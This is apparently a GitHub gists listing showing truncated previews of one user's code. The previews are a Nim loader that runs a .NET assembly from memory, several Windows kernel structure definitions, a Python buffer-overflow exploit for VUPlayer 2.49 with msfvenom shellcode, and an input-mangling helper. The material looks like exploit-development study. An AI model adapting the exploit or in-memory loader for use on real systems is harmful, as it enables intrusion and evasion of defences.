HACKE-RC / app.cs
Last active Oct 17, 2022
C# code of the .NET assembly used in loader.nim
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace CLRHello1
{
class Program
{
HACKE-RC / loader.nim
Created Oct 17, 2022
Nim loader that can load a .NET assembly from memory.
import winim/clr
# buffer contains the dll
var buf: array[3584, byte] = [
byte 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x80, 0x00, 0x00, 0x00, 0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD,
HACKE-RC / KTHREAD.c
Created May 31, 2022
The Windows KTHREAD structure.
struct _KTHREAD {
struct _DISPATCHER_HEADER Header;
void *SListFaultAddress;
unsigned int QuantumTarget;
void *InitialStack;
void *StackLimit;
void *StackBase;
unsigned int ThreadLock;
unsigned int CycleTime;
unsigned long CurrentRunTime;
HACKE-RC / ETHREAD.c
Created May 31, 2022
The Windows ETHREAD structure.
struct _ETHREAD {
struct _KTHREAD Tcb;
union _LARGE_INTEGER CreateTime;
union _LARGE_INTEGER ExitTime;
struct _LIST_ENTRY KeyedWaitChain;
void *ChargeOnlySession;
struct _LIST_ENTRY PostBlockList;
void *ForwardLinkShadow;
void *StartAddress;
struct _TERMINATION_PORT *TerminationPort;
HACKE-RC / TEB.c
Created May 31, 2022
The Windows TEB (Thread Environment Block) data structure.
struct _TEB {
struct _NT_TIB NtTib;
void *EnvironmentPointer;
struct _CLIENT_ID ClientId;
void *ActiveRpcHandle;
void *ThreadLocalStoragePointer;
struct _PEB *ProcessEnvironmentBlock;
unsigned long LastErrorValue;
unsigned long CountOfOwnedCriticalSections;
void *CsrClientThread;
HACKE-RC / KPROCESS.c
Created May 31, 2022
The Windows KPROCESS structure.
struct _KPROCESS {
struct _DISPATCHER_HEADER Header;
struct _LIST_ENTRY ProfileListHead;
unsigned int DirectoryTableBase;
unsigned long Asid;
struct _LIST_ENTRY ThreadListHead;
unsigned long ProcessLock;
unsigned long Spare0;
unsigned int DeepFreezeStartTime;
struct _KAFFINITY_EX Affinity;
HACKE-RC / EPROCESS.c
Created May 31, 2022
The Windows EPROCESS data structure.
typedef struct _EPROCESS {
struct _KPROCESS Pcb;
struct _EX_PUSH_LOCK ProcessLock;
PVOID UniqueProcessId;
struct _LIST_ENTRY ActiveProcessLinks;
struct _EX_RUNDOWN_REF RundownProtect;
ULONG Flags2;
ULONG JobNotReallyActive: 1;
ULONG AccountingFolded: 1;
ULONG NewProcessReported: 1;
HACKE-RC / exploit.py
Created Aug 17, 2021
VUPlayer 2.49 (Windows 7) - '.m3u' Local Buffer Overflow.
from struct import pack
offest = 1012
eip = pack("<I", 0x10022F07)
nops = "\x90"*16
size = 1100
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x1a" -f py Encoder=PexAlphaNum
buf = b""
buf += b"\xda\xdb\xd9\x74\x24\xf4\xba\x2c\x59\xcf\x98\x58\x2b"
HACKE-RC / mangler.py
Created Apr 30, 2021
Give '123456789' to any program that rearranges (mangles) its input, pass that program's output as the first argument to this script, and pass the input you want mangled in the same way as the second argument.
#!/bin/env python3
from sys import argv
work = True if len(argv)>2 else False
if not work:
exit()
pattern = '123456789'
mangled = argv[1]
res = []